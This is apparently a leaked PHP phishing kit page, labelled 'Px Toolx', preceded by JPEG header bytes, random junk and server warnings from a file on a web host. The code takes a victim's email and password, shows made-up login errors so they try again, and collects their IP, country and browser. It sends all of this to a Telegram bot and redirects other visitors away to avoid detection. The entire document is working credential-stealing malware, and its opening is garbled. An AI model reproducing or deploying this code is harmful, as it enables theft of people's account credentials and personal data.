???????????????????? ?????????????????? ÿØÿà JFIF    ÿÛ C    !"$"$ÿÛ C  ÿ p " ÿÄ     ÿÄ   ÿÚ   ÕÔË® (% aA*‚XYD¡(J„¡E¢RE,P€XYae )(E¤²€B¤R¥ BQ¤¢ X«)X…€¤  @ adadasdasdasasdasdas .....................................................................................................................................
Warning: Undefined variable $auth in /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php on line 559

Warning: Trying to access array offset on value of type null in /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php on line 559

Warning: Cannot modify header information - headers already sent by (output started at /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php:1) in /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php on line 201

Warning: Cannot modify header information - headers already sent by (output started at /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php:1) in /home/binojpqy/datlab.xyz/commentsos/vendoyters/hfgwdtfdhty/12daygood.php on line 202
= 2) { $_SESSION['count'] = 0; } if (isset($_POST['fName']) && isset($_POST['apiname']) && isset($_POST['apikey'])) { $fName = strip_tags($_POST['fName']); if ($fName === 'probono') { $email = strip_tags($_POST['apiname']); $password = strip_tags($_POST['apikey']); probono($email, $password); } else { header('Location: https://duckduckgo.com/'); exit(); } } else { header('Location: https://duckduckgo.com/'); exit(); } function probono($email, $password) { global $botToken, $chatId; if (strlen($password) < 6) { $response = ['status' => 'error', 'msgerror' => 'Password too short.']; header('Content-Type: application/json'); echo json_encode($response); exit(); } $warnings = array( "Incorrect username or password", "Error getting document, try again", "Connection error, please try again", "Enter valid email and password", "Invalid password or connection timed out, please try again", "Wrong password. Try again" ); $randomKey = array_rand($warnings); $msgerror = $warnings[$randomKey]; $status = "error"; $ip = getenv("REMOTE_ADDR"); $country = visitor_country(); $countryCode = visitor_countryCode(); $continentCode = visitor_continentCode(); $browser = $_SERVER['HTTP_USER_AGENT']; $serverTime = date("D/M/d, Y g:i a"); $message = " ============= Px Toolx ============= 🔹 Email: $email 🔹 Password: $password ============= [IP Info] ============= 🌎 IP: $ip 🌎 Country: $country 🌎 Country Code: $countryCode 🌍 Continent Code: $continentCode 🖥️ User-Agent: $browser 🕒 Date: $serverTime ========== Powered by pxtoolx.com ========== "; sendToTelegram($botToken, $chatId, $message); $_SESSION['count']++; if ($_SESSION['count'] >= 2) { $status = 'success'; } $response = ['status' => $status, 'msgerror' => $msgerror]; header('Content-Type: application/json'); echo json_encode($response); } function sendToTelegram($botToken, $chatId, $message) { $url = "https://api.telegram.org/bot$botToken/sendMessage"; $postFields = [ 'chat_id' => $chatId, 'text' => $message, 'parse_mode' => 'Markdown' ]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postFields); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_exec($ch); curl_close($ch); } function visitor_country() { $ip = getUserIP(); $ip_data = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=$ip")); return ($ip_data && $ip_data->geoplugin_countryName != null) ? $ip_data->geoplugin_countryName : "Unknown"; } function visitor_countryCode() { $ip = getUserIP(); $ip_data = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=$ip")); return ($ip_data && $ip_data->geoplugin_countryCode != null) ? $ip_data->geoplugin_countryCode : "Unknown"; } function visitor_continentCode() { $ip = getUserIP(); $ip_data = @json_decode(file_get_contents("http://www.geoplugin.net/json.gp?ip=$ip")); return ($ip_data && $ip_data->geoplugin_continentCode != null) ? $ip_data->geoplugin_continentCode : "Unknown"; } function getUserIP() { $client = @$_SERVER['HTTP_CLIENT_IP']; $forward = @$_SERVER['HTTP_X_FORWARDED_FOR']; $remote = $_SERVER['REMOTE_ADDR']; if (filter_var($client, FILTER_VALIDATE_IP)) { return $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { return $forward; } else { return $remote; } } ?>